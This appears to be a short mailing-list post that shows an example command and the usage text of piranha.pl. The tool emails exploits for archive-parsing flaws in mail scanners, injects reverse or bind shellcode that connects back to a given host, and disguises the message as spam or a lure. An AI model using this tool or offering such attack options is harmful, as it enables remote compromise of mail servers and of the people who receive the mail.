Send some Christmas cards:

    $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a myname@mydomain.com

    Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]

    Mandatory arguments:
      -e+  Exploit number to use (See below)
      -h+  SMTP server to test
      -a+  Destination email address used in probing

    Optional arguments:
      -s+  Shellcode type to inject into exploits (See below)
      -c+  Cloaking style (See below)
      -d+  Try to vanish attachments from MUA's view (See below)
      -v   Attach EICAR virus to improve stealthness
      -z   Pack all the malware into a tarball to be less noisy
      -p+  Port to use in reverse shell or bind shell
      -l+  Host to connect back in reverse shell mode

    Valid exploits numbers:
      0  OSVDB #5753: LHA get_header File Name Overflow
      1  OSVDB #5754: LHA get_header Directory Name Overflow
      2  OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
      3  OSVDB #11695: unarj Filename Handling Overflow
      4  OSVDB #23460: ZOO combine File and Dir name overflow
      5  OSVDB #15867: Convert UUlib uunconc integer overflow
      6  OSVDB #XXX: ZOO next offset infinite loop DoS

    Valid shellcode types:
      0  TCP reverse shell
      1  UDP reverse shell
      2  TCP bind shell

    Valid cloaking styles (consult whitepaper for visual result):
      0  No cloaking at all (default)
      1  Viagra spam message
      2  "Look at the pictures I promised you!"

    Vanishing techniques for attachments:
      0  No vanishing at all (default)
      1  Multipart/alternative trick
      2  trick

www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or take the Blue [XP/Vista Update] Pill & stay happily ignorant.
http://uncyclopedia.wikia.com/wiki/Satan_Claus